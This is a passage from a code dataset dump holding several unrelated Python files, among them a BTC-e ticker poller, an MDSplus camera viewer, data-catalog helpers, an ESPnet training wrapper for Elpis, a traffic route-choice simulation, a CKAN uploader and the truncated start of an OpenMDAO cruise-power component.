urllib2.urlopen('https://btc-e.com/api/2/btc_usd/ticker')\n data = json.load(response)\n print(\"[\" + datetime.datetime.fromtimestamp(int(data['ticker']['updated'])).strftime('%Y-%m-%d %H:%M:%S') + \"] \"\n + \"Bid: \" + str(data['ticker'][\"buy\"]) + \" | \" + \"Ask: \" + str(data['ticker'][\"sell\"]) + \" || \" +\n \"Last: \" + str(data['ticker'][\"last\"]))\n time.sleep(1)\n # except:\n # print(\"Closing connection\")\n\nif __name__ == \"__main__\":\n main()","sub_path":"btce/market_data.py","file_name":"market_data.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"260723280","text":"import MDSplus as mds\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom matplotlib.widgets import Slider, Button\nimport sys\n\nshot_number = 113\ntree = mds.Tree(\"mpts_manual\", shot_number)\n\ncamera = tree.getNode(\"\\\\Phantom1\")\ndata = camera.SIGNAL.getData().data()\n\nfig, ax = plt.subplots(1, 
1)\nplt.subplots_adjust(bottom=0.25)\nax.pcolormesh(data[0, :, :], cmap=cm.gray)\nax.set_aspect('auto')\n(frames, numcols, numrows) = data.shape\n\n# ax.set_ylim(0, 15)\n# ax.set_xlim(shot.X['K'].min(), shot.X['K'].max())\n# ax.set_ylabel(\"beating freq. (MHz)\")\n# ax.set_xlabel(\"freq (GHz)\")\nplt.title = fig.suptitle(\"# %s - Frame: %d\" % (shot_number, 1))\n\naxfreq = plt.axes([0.25, 0.1, 0.5, 0.03])\n\nsweep = Slider(axfreq, 'Sweep', 0, frames - 1, valinit=1, valfmt='%d')\n\n\ndef update(val):\n i = int(sweep.val)\n ax.pcolormesh(data[i, :, :], cmap=cm.gray)\n plt.title = fig.suptitle(\"# %s - Frame: %d\" % (shot_number, i))\n fig.canvas.draw_idle()\n\n\nsweep.on_changed(update)\n\nresetax = plt.axes([0.8, 0.025, 0.1, 0.04])\nbutton = Button(resetax, 'Reset', hovercolor='0.975')\n\n\ndef reset(event):\n sweep.reset()\n\n\nbutton.on_clicked(reset)\n\nplt.show()\n","sub_path":"tools/plot_data_cam2.py","file_name":"plot_data_cam2.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"67189198","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Funciones auxiliares\"\"\"\n\nimport os\nimport shutil\nfrom openpyxl import load_workbook\nimport zipfile\nimport datetime\nimport time\nfrom urllib import parse as urlparse\n\nimport yaml\nimport logging\nimport logging.config\nimport yaml\nfrom download_utils import download, download_to_file\n\nfrom paths import CONFIG_DOWNLOADS_PATH\nfrom paths import CATALOGS_INDEX_PATH, CONFIG_GENERAL_PATH\n\nFREQ_ISO_TO_HUMAN = {\n \"R/P1Y\": \"anual\",\n \"R/P6M\": \"semestral\",\n \"R/P3M\": \"trimestral\",\n \"R/P1M\": \"mensual\",\n \"R/P1D\": \"diaria\"\n}\n\nSEPARATOR_WIDTH = 60\n\n\ndef safe_sheet_name(string):\n invalid_chars = \"[]:*?/\\\\\"\n for invalid_char in invalid_chars:\n string = string.replace(invalid_char, \"_\")\n return string\n\n\ndef indicators_to_text(simple_dict):\n text = \"\\n\" + \"\\n\".join(\"{}: {}\".format(key.ljust(40), value)\n for key, value in sorted(\n list(simple_dict.items()), key=lambda x: x[0]))\n return text\n\n\ndef timeit(method):\n def timed(*args, **kw):\n ts = time.time()\n result = method(*args, **kw)\n te = time.time()\n\n print('{} ({}, {}) {%2.2f} sec'.format(method.__name__, args, kw,\n te - ts))\n return result\n\n return timed\n\n\ndef print_zipfile_info(path):\n zf = zipfile.ZipFile(path)\n for info in zf.infolist():\n print(info.filename)\n print('\\tComment:\\t', info.comment)\n print('\\tModified:\\t', datetime.datetime(*info.date_time))\n print('\\tSystem:\\t\\t', info.create_system, '(0 = Windows, 3 = Unix)')\n print('\\tZIP version:\\t', info.create_version)\n print('\\tCompressed:\\t', info.compress_size, 'bytes')\n print('\\tUncompressed:\\t', info.file_size, 'bytes')\n\n\ndef compress_file(from_path, to_path):\n zf = zipfile.ZipFile(to_path, 'w', zipfile.ZIP_DEFLATED)\n try:\n zf.write(from_path, os.path.basename(from_path))\n finally:\n zf.close()\n # print_zipfile_info(to_path)\n\n\ndef freq_iso_to_xlseries(freq_iso8601):\n frequencies_map = {\n \"R/P1Y\": \"Y\",\n \"R/P6M\": \"S\",\n \"R/P3M\": \"Q\",\n \"R/P1M\": \"M\",\n \"R/P1D\": \"D\"\n }\n return frequencies_map[freq_iso8601]\n\n\ndef freq_iso_to_pandas(freq_iso8601, how=\"start\"):\n frequencies_map_start = {\n \"R/P1Y\": \"AS\",\n \"R/P6M\": \"6MS\",\n \"R/P3M\": \"QS\",\n \"R/P1M\": \"MS\",\n \"R/P1D\": \"DS\"\n }\n frequencies_map_end = {\n \"R/P1Y\": \"A\",\n \"R/P6M\": \"6M\",\n \"R/P3M\": \"Q\",\n \"R/P1M\": \"M\",\n 
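# The ISO 8601 repeating-interval codes map onto pandas offset aliases: this \"end\"\n        # table anchors each period on its end (e.g. \"R/P3M\", quarterly, becomes \"Q\"),\n        # while the *_start table above uses the period-start variants (\"QS\", \"MS\", ...).\n        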
\"R/P1D\": \"D\"\n }\n if how == \"start\":\n return frequencies_map_start[freq_iso8601]\n elif how == \"end\":\n return frequencies_map_end[freq_iso8601]\n else:\n raise Exception(\n \"{} no se reconoce para 'how': debe ser 'start' o 'end'\".format(\n how))\n\n\ndef remove_other_files(directory):\n \"\"\"Se asegura de que un directorio exista.\"\"\"\n ensure_dir_exists(directory)\n shutil.rmtree(directory)\n ensure_dir_exists(directory)\n\n\ndef ensure_dir_exists(directory):\n \"\"\"Se asegura de que un directorio exista.\"\"\"\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef get_ws_case_insensitive(wb, title):\n \"\"\"Devuelve una hoja en un workbook sin importar mayúsculas/minúsculas.\"\"\"\n return wb[find_ws_name(wb, title)]\n\n\ndef find_ws_name(wb, name):\n \"\"\"Busca una hoja en un workbook sin importar mayúsculas/minúsculas.\"\"\"\n if type(wb) == str or type(wb) == str:\n wb = load_workbook(wb, read_only=True, data_only=True)\n\n for sheetname in wb.sheetnames:\n if sheetname.lower() == name.lower():\n return sheetname\n\n return None\n\n\ndef row_from_cell_coord(coord):\n return int([x for x in coord if x.isdigit()])\n\n\ndef load_yaml(path):\n with open(path, encoding=\"utf-8\") as config_file:\n return yaml.load(config_file)\n\n\ndef get_catalogs_index():\n return load_yaml(CATALOGS_INDEX_PATH)\n\n\ndef get_general_config():\n return load_yaml(CONFIG_GENERAL_PATH)\n\n\ndef get_logger(name=__name__):\n levels = {\n 'critical': logging.CRITICAL,\n 'error': logging.ERROR,\n 'warning': logging.WARNING,\n 'info': logging.INFO,\n 'debug': logging.DEBUG\n }\n\n config = get_general_config()\n selected_level = levels[config['logging']]\n\n logger = logging.getLogger(name)\n logger.setLevel(selected_level)\n\n ch = logging.StreamHandler()\n ch.setLevel(selected_level)\n\n logging_formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n '%Y-%m-%d %H:%M:%S')\n ch.setFormatter(logging_formatter)\n logger.addHandler(ch)\n\n return logger\n\n\nlogger = get_logger(os.path.basename(__file__))\n\n\ndef print_log_separator(logger, message):\n logger.info(\"=\" * SEPARATOR_WIDTH)\n logger.info(\"|\" + \" \" * (SEPARATOR_WIDTH - 2) + \"|\")\n\n logger.info(\"|\" + message.center(SEPARATOR_WIDTH - 2) + \"|\")\n\n logger.info(\"|\" + \" \" * (SEPARATOR_WIDTH - 2) + \"|\")\n logger.info(\"=\" * SEPARATOR_WIDTH)\n\n\ndef is_http_or_https(url):\n return urlparse.urlparse(url).scheme in [\"http\", \"https\"]\n\n\ndef get_catalog_download_config(catalog_id):\n try:\n configs = load_yaml(CONFIG_DOWNLOADS_PATH)\n except:\n logger.warning(\n \"No se pudo cargar el archivo de configuración 'config_downloads.yaml'.\"\n )\n logger.warning(\"Utilizando configuración default...\")\n configs = {\"defaults\": {}}\n\n default_config = configs[\"defaults\"]\n\n config = configs[catalog_id] if catalog_id in configs else {}\n if \"catalog\" not in config:\n config[\"catalog\"] = {}\n if \"sources\" not in config:\n config[\"sources\"] = {}\n\n for key, value in list(default_config.items()):\n for subconfig in list(config.values()):\n if key not in subconfig:\n subconfig[key] = value\n\n return config\n\n\ndef download_with_config(url, file_path, config):\n download_to_file(url, file_path, **config)\n","sub_path":"scripts/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":6060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"485149849","text":"#!usr/bin/env python\nfrom pt import 
PT\nimport cPickle\n\n\n# build the Patricia Tree and save it to a pickle file so that we can load it\n# from disk\ndef build(fName_in, fName_out):\n pt = PT()\n with open(fName_in, \"rb\") as g:\n unpickler = cPickle.Unpickler(g)\n while True:\n try:\n row = unpickler.load()\n pt.insert(row[0], row[1:])\n except EOFError:\n break\n g.close()\n with open(fName_out, \"wb\") as gt:\n pickler = cPickle.Pickler(gt)\n pickler.dump(pt)\n gt.close()\n\n\nif __name__ == \"__main__\":\n build(\"../pickle_data/geodatanew.pkl\", \"../pickle_data/geo_pt.pkl\")\n","sub_path":"pt/build_pt.py","file_name":"build_pt.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"630348700","text":"\"\"\" Support for training ESPnet models.\"\"\"\nimport os\nfrom pathlib import Path\nimport re\nimport shutil\nimport subprocess\nimport threading\nfrom typing import Callable\n\nfrom elpis.engines.common.objects.command import run\nfrom elpis.engines.common.objects.dataset import Dataset\nfrom elpis.engines.common.objects.model import Model as BaseModel\nfrom elpis.engines.kaldi.input.json_to_kaldi import create_kaldi_structure\n\n\nclass EspnetModel(BaseModel):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n # ESPnet does not use a pronunciation dictionary so this will not\n # change from None.\n self.pron_dict = None\n self.config['pron_dict_name'] = None\n # ESPnet doesn't use an n-gram language model, so this will not change\n # from None.\n self.config['ngram'] = None\n self.config['engine_name'] = 'espnet'\n self.config['status'] = 'untrained'\n stage_names = {\n \"train\": \"Train\"\n }\n super().build_stage_status(stage_names)\n self.venv_path = Path(\"/espnet/tools/venv/bin/python3\")\n self.config['gpus'] = int(subprocess.check_output(f\"{self.venv_path} -c 'import torch; print(torch.cuda.device_count())'\", shell=True))\n print(f\"Number of GPUs: {self.config['gpus']}\")\n\n @classmethod\n def load(cls, base_path: Path):\n self = super().load(base_path)\n self.pron_dict = None\n return self\n\n @property\n def status(self):\n # Update stage status\n run_log_path = self.path.joinpath('train.log')\n if not run_log_path.is_file():\n run(f\"touch {run_log_path};\")\n with open(run_log_path) as log_file:\n log_text = log_file.read()\n self.stage_status = (\"train\", 'in-progress', '', log_text)\n # Stage 4 train log is not written to the main train log, so read it from the exp dir\n is_stage_4 = re.search('stage 4: Network Training\\n\\Z', log_text, flags=re.MULTILINE)\n if is_stage_4:\n # Train stage 4 log is in the exp dir... 
something like exp/train_nodev_pytorch_train_mtlalpha1.0\n        path_gen = self.path.glob(\"espnet-asr1/exp/train*/train.log\")\n        # Assumes just one train* experiment directory, which is true in the\n        # current implementation.\n        stage_4_log_path = next(path_gen, None)\n        stage_4_text = \"\"\n        if stage_4_log_path is not None:\n            with open(stage_4_log_path) as stage_4_log_file:\n                stage_4_text = stage_4_log_file.read()\n        self.stage_status = (\"train\", \"in-progress\", \"\", f\"{log_text}\\n{stage_4_text}\")\n        return self.config['status']\n\n    @status.setter\n    def status(self, value: str):\n        self.config['status'] = value\n\n    def has_been_trained(self):\n        return self.status == 'trained'\n\n    def link(self, dataset: Dataset, _pron_dict):\n        self.dataset = dataset\n        self.config['dataset_name'] = dataset.name\n        # Note the _pron_dict is ignored as it's irrelevant to ESPnet.\n\n    def build_structure(self):\n        print(\"BUILD STRUCTURE\")\n        # NOTE Since the ESPnet data is similar to Kaldi in terms of formatting requirements,\n        # code is unfortunately being duplicated from KaldiModel.\n        # I'm not sure the best way to get around this, but calling create_kaldi_structure()\n        # here does limit that duplication somewhat.\n        output_path = self.path.joinpath('output')\n        output_path.mkdir(parents=True, exist_ok=True)\n\n        print(\"OUTPUT PATH: {}\".format(output_path))\n\n        # Copy cleaned corpus from dataset to the model\n        dataset_corpus_txt = self.dataset.path.joinpath('cleaned', 'corpus.txt')\n        model_corpus_txt = self.path.joinpath('corpus.txt')\n        if dataset_corpus_txt.exists():\n            shutil.copy(f'{dataset_corpus_txt}', f'{model_corpus_txt}')\n        create_kaldi_structure(\n            input_json=f'{self.dataset.pathto.annotation_json}',\n            output_folder=f'{output_path}',\n            silence_markers=False,\n            corpus_txt=f'{model_corpus_txt}'\n        )\n\n    def train(self, on_complete: Callable = None):\n\n        def prepare_for_training():\n            # This should just copy the ESPnet experiment directory into the\n            # model directory and then copy the prepared train/test langdir\n            # stuff into the appropriate subdirectory.\n\n            # First make a copy of the ESPnet Elpis recipe\n            local_espnet_path = self.path.joinpath(\"espnet-asr1\")\n            shutil.copytree(\"/espnet/egs/elpis/asr1\", f\"{local_espnet_path}\")\n\n            # Then move the train/test data across.\n            src_train_dir = self.path.joinpath(\"output/training\")\n            tgt_train_dir = local_espnet_path.joinpath(\"data/train\")\n            shutil.copytree(src_train_dir, tgt_train_dir)\n\n            src_test_dir = self.path.joinpath(\"output/testing\")\n            tgt_test_dir = local_espnet_path.joinpath(\"data/test\")\n            shutil.copytree(src_test_dir, tgt_test_dir)\n\n            # Then move the WAVs across\n            src_wav_dir = self.dataset.path.joinpath(\"resampled\")\n            for wav in src_wav_dir.glob(\"*.wav\"):\n                shutil.copy(wav, local_espnet_path)\n\n        def train():\n            local_espnet_path = self.path.joinpath(\"espnet-asr1\")\n            run_log_path = self.path.joinpath('train.log')\n            print(f\"SELF PATH {self.path}\")\n            if run_log_path.is_file():\n                os.remove(run_log_path)\n            try:\n                run(f\"cd {local_espnet_path}; ./run.sh --ngpu {self.config['gpus']} --nj 1 &> {run_log_path}\")\n                print('done')\n                self.status = 'trained'\n            except subprocess.CalledProcessError as e:\n                with open(run_log_path, 'a+') as file:\n                    print('stderr', e.stderr, file=file)\n                    print('failed', file=file)\n                print('failed')\n                self.status = f'failed with code {e.returncode}'\n\n        def run_training_in_background():\n            def background_train_task():\n                prepare_for_training()\n                train()\n                self.results = EspnetModel.get_train_results(self)\n                on_complete()\n            self.status = 'training'\n            t = threading.Thread(target=background_train_task)\n            t.start()\n\n        if on_complete is None:\n            print(\"oncomplete is none\")\n            self.status = 'training'\n            prepare_for_training()\n            train()\n            # train() records 'trained' on success or a failure status on error,\n            # so don't overwrite self.status here.\n            self.results = EspnetModel.get_train_results(self)\n        else:\n            print(\"oncomplete is not none\")\n            run_training_in_background()\n        return\n\n    def get_train_results(self):\n        path_gen = self.path.glob(\"espnet-asr1/exp/train*/decode_test*/result.txt\")\n        # Assumes just one decode_test* directory, which is true in the current\n        # implementation (transcription will use decode_infer*...)\n        log_file = next(path_gen)\n        with open(log_file) as f:\n            text = f.read()\n\n        # Regex for one whitespace-delimited column of sclite's Sum/Avg row\n        val = r\"[^ ]+\"\n        avg_line_re = (rf\"Sum/Avg *\\| *\\d+ *\\d+ *\\| *{val} *\" +\n                       rf\"(?P<sub>{val}) *(?P<del>{val}) *(?P<ins>{val}) *(?P<per>{val}) *{val}\"\n                       )\n        try:\n            sub = re.search(avg_line_re, text).group(\"sub\")\n            del_ = re.search(avg_line_re, text).group(\"del\")\n            ins = re.search(avg_line_re, text).group(\"ins\")\n            per = re.search(avg_line_re, text).group(\"per\")\n        except AttributeError:\n            # No Sum/Avg line found: report no results rather than crash on float(None) below.\n            return None\n\n        results = {\"comparison_val\": float(per),  # property common to all engines so the GUI can sort models by a result value\n                   \"per\": float(per),\n                   \"ins_val\": int(float(ins)),\n                   \"del_val\": int(float(del_)),\n                   \"sub_val\": int(float(sub))}\n\n        print(results)\n        return results\n","sub_path":"elpis/engines/espnet/objects/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
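A quick, self-contained check of the Sum/Avg parsing above. The scoring line is invented, but it follows the sclite result.txt column order (Corr Sub Del Ins Err S.Err) that the regex assumes:

import re

val = r"[^ ]+"
avg_line_re = (rf"Sum/Avg *\| *\d+ *\d+ *\| *{val} *"
               rf"(?P<sub>{val}) *(?P<del>{val}) *(?P<ins>{val}) *(?P<per>{val}) *{val}")

# Hypothetical scoring line; the real file is exp/train*/decode_test*/result.txt
line = "| Sum/Avg | 100 800 | 91.2 5.1 3.7 2.4 11.2 45.0 |"
m = re.search(avg_line_re, line)
print(m.group("sub"), m.group("del"), m.group("ins"), m.group("per"))  # 5.1 3.7 2.4 11.2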
+{"seq_id":"155981492","text":"from agents import *\nfrom environment import *\nimport pickle\nimport pandas as pd  # route_log and count_log below are DataFrames\n\n# Init variables\nhv = 500 # n of HVs\nav = 500 # n of AVs\nN = 500 # n of Days\norig = '1'\ndest = '9'\nhv_err = 5 # error term on HV time perception ~N(0, hv_err)\nhv_theta = .5 # rationality\nhv_beta = .5 # prob of change route\nhv_len = 3 # Memory length\nhv_atis_bias = 0 # bias*prevTT + (1-bias)*memTT\nav_err = 0\nav_theta = 1\nav_len = 1000\nav_atis_bias = 0\n\n# Data save paths\nroute_dir = f\"data/sim-ROUTES-N{N}-hv{hv}at{hv_err}_{hv_theta}_{hv_beta}_{hv_len}_{hv_atis_bias}-av{av}at{av_err}_{av_theta}_{av_len}_{av_atis_bias}.pickle\"\nroads_dir = f\"data/sim-ROADS-N{N}-hv{hv}at{hv_err}_{hv_theta}_{hv_beta}_{hv_len}_{hv_atis_bias}-av{av}at{av_err}_{av_theta}_{av_len}_{av_atis_bias}.pickle\"\n\n# Square Network\nroads = [Road('1', '2', 720, 20), Road('2', '3', 720, 12), Road('1', '4', 480, 15), Road('2', '5', 360, 12),\n\tRoad('3', '6', 720, 12), Road('4', '5', 300, 10), Road('5', '6', 360, 12), Road('4', '7', 480, 15),\n\tRoad('5', '8', 300, 10), Road('6', '9', 720, 30), Road('7', '8', 480, 15), Road('8', '9', 480, 15)]\n\n# Make Network from roads\nnetwork = Network(roads)\n\n# Make drivers\ndrivers = [HV(orig, dest, err = hv_err, theta = hv_theta, beta = hv_beta, L = hv_len) for i in range(0, hv)]\nif av > 0:\n    drivers = drivers + [AV(orig, dest, theta = av_theta, err = av_err, L = av_len, atis_bias = av_atis_bias) for i in range(0, av)]\n\n# Day 1\nfor driver in drivers:\n    driver.learn(network)\nnetwork.update(drivers)\n\n# Make logs\ncount_log = pd.DataFrame(columns = [f'Road{i}' for i in range(len(network.roadlist))])\nroute_log = pd.DataFrame(columns = [f'Route{i}' for i in range(len(drivers[0].routes))])\n\n# Save day 1 data\ncount_log.loc[0] = [road.count for road in network.roadlist]\nroute_count = [0 for route in range(len(drivers[0].routes))]\nfor driver in drivers:\n    # Add one to route i, if driver took route i\n    route_count[driver.i] = route_count[driver.i] + 1\nroute_log.loc[0] = route_count\n\n# Day > 1 Loop\nfor i in range(1,N):\n\n    # Simulate\n    for driver in drivers:\n        driver.drive(network)\n    network.update(drivers)\n    \n    # Save data\n    count_log.loc[i] = [road.count for road in network.roadlist]\n    route_count = [0 for route in route_log.keys()]\n    for driver in drivers:\n        route_count[driver.i] = route_count[driver.i] + 1\n    route_log.loc[i] = route_count\n\n# Export data to file for analysis\nwith open(route_dir, \"wb\") as route_file:\n    pickle.dump(route_log, route_file)\nwith open(roads_dir, \"wb\") as roads_file:\n    pickle.dump(count_log, roads_file)","sub_path":"sim/sim_script_demo.py","file_name":"sim_script_demo.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
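Once a run finishes, the two pickles can be loaded back for analysis. A minimal sketch; the filename is just an example of what the route_dir naming scheme produces for the defaults above:

import pickle

# Hypothetical output of one run (N=500, default hyperparameters)
route_dir = "data/sim-ROUTES-N500-hv500at5_0.5_0.5_3_0-av500at0_1_1000_0.pickle"

with open(route_dir, "rb") as f:
    route_log = pickle.load(f)   # pandas DataFrame, one row per simulated day

# Average share of drivers on each route over the last 100 days (hv + av = 1000 drivers)
print(route_log.tail(100).mean() / (500 + 500))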
+{"seq_id":"141012047","text":"#!/usr/local/bin/python\n# -*- coding: utf-8 -*-\n\n\n# # We'll use the package_create function to create a new dataset.\n# request = urllib2.Request(\n#     'http://www.my_ckan_site.com/api/action/package_create')\n# \n# # Creating a dataset requires an authorization header.\n# # Replace *** with your API key, from your user account on the CKAN site\n# # that you're creating the dataset on.\n# request.add_header('Authorization', 'a059851e-dea1-4638-aeb4-1c4a7d789fa5')\n# \n\n\nimport argparse\nimport requests\nimport os.path\nimport urllib.request\nimport re\nimport sys\nimport time\n\nfrom urllib.parse import urlparse\nfrom urllib.error import URLError\nfrom cli_utils import url_exists, prompt\n\nimport ckanapi\n\n\nclass CkanUtil:\n\n    def __init__(self, ckan_server, api_key):\n        self.server = ckan_server\n        self.api_key = api_key\n        self.ckan_inst = ckanapi.RemoteCKAN(\n            self.server,\n            apikey=self.api_key,\n            user_agent='CKAN SHP Uploader'\n        )\n\n    def fileUpload(self, dataset_name, dataset_title, filepath):\n        print('fileUpload --> '+dataset_name+' :: '+filepath)\n        try:\n            pkg = self.ckan_inst.action.package_create(\n                name=dataset_name,\n                title=dataset_title,\n                owner_org='vta')\n        except ckanapi.NotAuthorized as ex:\n            print('access denied. Is your API key valid?')\n            print(ex)\n            return\n\n        self.ckan_inst.action.resource_create(\n            package_id=dataset_name,\n            upload=open(filepath, 'rb'),\n            url='',\n            format='csv')\n\n\nclass Uploader:\n    def __init__(self):\n        self.server_url = None\n        self.api_key = None\n        self.dataset_name = None\n        self.filename = None\n\n    def prompt_args(self):\n\n        def _url_ok(v):\n            # url_exists() raises ArgumentTypeError for argparse; map that to False here\n            try:\n                return bool(url_exists(v))\n            except argparse.ArgumentTypeError:\n                return False\n\n        self.server_url = prompt(\n            message = \"Enter the URL of the CKAN server\", \n            errormessage= \"The URL you provided is not valid (it must be the full URL)\",\n            isvalid = _url_ok)\n\n        self.api_key = prompt(\n            message = \"Enter the API key to use for uploading\", \n            errormessage= \"A valid API key must be provided. This key can be found in your user profile in CKAN\",\n            isvalid = lambda v : re.search(r\"(([^-])+-){4}[^-]+\", v))\n\n        self.filename = prompt(\n            message = \"Enter the path of the file to upload\", \n            errormessage= \"The file path you provided does not exist\",\n            isvalid = lambda v : os.path.isfile(v))\n\n        self.dataset_name = prompt(\n            message = \"Enter the name of the dataset you want to create\", \n            errormessage= \"The dataset must be named\",\n            isvalid = lambda v : len(v) > 0)\n\n\n    def upload(self):\n        ckan = CkanUtil(self.server_url, self.api_key)\n        # fileUpload expects (name, title, filepath); reuse the name as the display title\n        ckan.fileUpload(self.dataset_name, self.dataset_name, self.filename)\n\n    def to_string(self):\n        return self.server_url +' '+ self.api_key +' '+ self.dataset_name +' '+ self.filename\n\n\ndef url_exists(url):\n    parsed_url = urlparse(url)\n    if not bool(parsed_url.scheme):\n        raise argparse.ArgumentTypeError(\"{0} is not a valid URL\".format(url))\n    try:\n        urllib.request.urlopen(url)\n        return url  # URL exists\n    except ValueError:\n        # URL not well formatted\n        raise argparse.ArgumentTypeError(\"{0} is not a valid URL\".format(url))\n    except URLError:\n        # URL doesn't seem to be alive\n        raise argparse.ArgumentTypeError(\"could not connect to the server at {0}\".format(url))\n\n\ndef valid_api_key(arg):\n    if re.search(r\"(([^-])+-){4}[^-]+\", arg):\n        return arg\n    raise argparse.ArgumentTypeError(\"{0} is not a valid API key\".format(arg))\n\n\ndef valid_file(fname):\n    if os.path.isfile(fname):\n        return fname\n    raise argparse.ArgumentTypeError(\"{0} is not a valid filepath\".format(fname))\n\n\nif __name__ == '__main__':\n    uploader = Uploader()\n\n    # http://stackoverflow.com/a/7856172/940217\n    parser = argparse.ArgumentParser(description='Upload files to CKAN')\n    subparsers = parser.add_subparsers(description='available subcommands')\n\n    parser_main = subparsers.add_parser('direct', help='provide input as positional arguments')\n    parser_main.add_argument('url', metavar='url', type=url_exists, help='the full URL of the CKAN server')\n    parser_main.add_argument('key', metavar='key', type=valid_api_key,\n                             help=('the API key to use for interacting with the API '\n                                   '(this key can be found in your user profile in CKAN)'))\n    parser_main.add_argument('name', metavar='name', type=str, help='the name of the dataset you want to create')\n    parser_main.add_argument('title', metavar='title', type=str, help='Title to display for the dataset')\n    parser_main.add_argument('filename', metavar='filename', type=valid_file, help='the path of the file to upload')\n    \n    parser_interactive = subparsers.add_parser('interactive', help='enter interactive mode to be prompted for input')\n    \n    args = parser.parse_args()\n\n    if hasattr(args, 'url'):\n        # 'direct' subcommand: everything came in as positional arguments\n        ckan_util = CkanUtil(ckan_server=args.url,\n                             api_key=args.key)\n        ckan_util.fileUpload(dataset_name=args.name,\n                             dataset_title=args.title,\n                             filepath=args.filename)\n    else:\n        # 'interactive' subcommand: prompt for the values instead\n        uploader.prompt_args()\n        uploader.upload()\n","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":5384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
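For reference, a minimal programmatic use of CkanUtil; the server URL, API key, and file path below are placeholders, not real credentials. The shell equivalent is python upload.py direct <url> <key> <name> <title> <file>:

from upload import CkanUtil

util = CkanUtil('https://ckan.example.org',                      # placeholder server
                '12345678-aaaa-bbbb-cccc-1234567890ab')          # placeholder API key
util.fileUpload(dataset_name='my-dataset',
                dataset_title='My Dataset',
                filepath='data.csv')                             # placeholder CSV path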
+{"seq_id":"351486079","text":"# Name: cruise_power_what_if.py\n# Company: MetaMorph, Inc.\n# Author(s): Austin Tabulog, Joseph Coombe\n# Email: jcoombe@metamorphsoftware.com\n# Create Date: 8/10/2017\n# Edit Date: 8/10/2017\n\n# Conversion of Airbus A^3's vahanaTradeStudy>reserveMission.mat code\n# (located here: https://github.com/VahanaOpenSource/vahanaTradeStudy ) \n# to Python 2.7 for use in the MetaMorph, Inc. OpenMETA environment.\n\n# Estimate cruise power for a tilt-wing or helicopter VTOL configuration\n# Inputs:\n#   #TODO\n\n# Outputs:\n#   #TODO\n\nfrom __future__ import print_function\n\nfrom openmdao.api import IndepVarComp, Component, Problem, Group\nimport math\n\nclass CruisePower(Component):\n\n    def __init__(self):\n        super(CruisePower, self).__init__()\n        \n        self.add_param('Vehicle', val=u'abcdef', description='Vehicle type', pass_by_obj=True)  # 'tiltwing' or 'helicopter'\n        self.add_param('rProp', val=0.0, description='prop/rotor radius [m]')\n        self.add_param('V', val=0.0, description='Cruise speed [m/s]')\n        self.add_param('W', val=0.0, description='Weight of vehicle [N]')\n        self.add_param('wingProfileCD', val=0.0)\n        \n        self.add_output('etaProp', val=0.0, description='efficiency of Prop')\n        self.add_output('etaMotor', val=0.0, description='efficiency of motor')\n        self.add_output('CLmax', val=0.0, description='maximum CL for aircraft, section cl is much higher')\n        self.add_output('bRef', val=0.0, description='reference wingspan assuming 2 props per wing with outboard props are at wingtips, 1 meter wide fuselage plus clearance between props and fuselage')\n        self.add_output('SRef', val=0.0, description='reference surface area of both wings')\n        self.add_output('cRef', val=0.0, description='Chord calculation of each wing')\n        self.add_output('AR', val=0.0, description='Aspect Ratio of wings')\n        self.add_output('D', val=0.0, description='Force of Drag on vehicle at cruise')\n        self.add_output('PCruise', val=0.0, description='Power required during cruise')\n        self.add_output('PBattery', val=0.0, description='battery power required for cruise')\n        self.add_output('Cd0', val=0.0, description='Overall profile drag coefficient')\n        self.add_output('CL', val=0.0, description='CL during cruise')\n        self.add_output('LoverD', val=0.0, description='total lift over drag')\n        self.add_output('omega', val=0.0, description='angular velocity of blade tips')\n        self.add_output('alpha', val=0.0, description='inflow angle')\n        self.add_output('mu', val=0.0, description='advance ratio')\n        self.add_output('Ct', val=0.0, description='Thrust coefficient (including tip loss factor for effective disk area)')\n        self.add_output('lambda', val=0.0, description='inflow ratio, solved with Newton method')\n        self.add_output('v', val=0.0, description='induced velocity [m/s]')\n        self.add_output('SCdFuse', val=0.0, description='Drag area of fuselage and gears combined [m^2]')\n        self.add_output('Cd0Wing', val=0.0, description='wing profile drag coefficient')\n        self.add_output('e', val=0.0, description='span efficiency')\n        self.add_output('B', val=0.0, description='Tip loss factor')\n        self.add_output('sigma', val=0.0, description='Blade solidity')\n        \n        \n    def solve_nonlinear(self, params, unknowns, resids):\n        # Altitude, compute atmospheric properties\n        rho = 1.225\n        \n        # Fuselage / landing gear area\n        unknowns['SCdFuse'] = 0.35\n\n        if(params['Vehicle'].lower().replace('-', '') == \"tiltwing\"):\n            # Specify stall conditions\n            VStall = 35  # m/s\n            unknowns['CLmax'] = 1.1  # Whole aircraft CL, section Clmax much higher\n\n            # Compute Wingspan assuming 2 props per wing with outboard props are at\n            # wingtips, 1 meter wide fuselage plus clearance between props and fuselage\n            unknowns['bRef'] = 6 * params['rProp'] + 1.2  # Rough distance between hubs of outermost props\n\n            # Compute reference area (counting both wings)\n            unknowns['SRef'] = params['W'] / (0.5 * rho * VStall**2 * unknowns['CLmax'])\n\n            # Compute reference chord (chord of each wing)\n            unknowns['cRef'] = 0.5 * unknowns['SRef'] / unknowns['bRef'] \n            \n            # Equivalent aspect ratio\n            unknowns['AR'] = unknowns['bRef']**2 / unknowns['SRef']\n\n            # Motor efficiency\n            unknowns['etaMotor'] = 0.85\n\n            # Wing profile drag coefficient\n            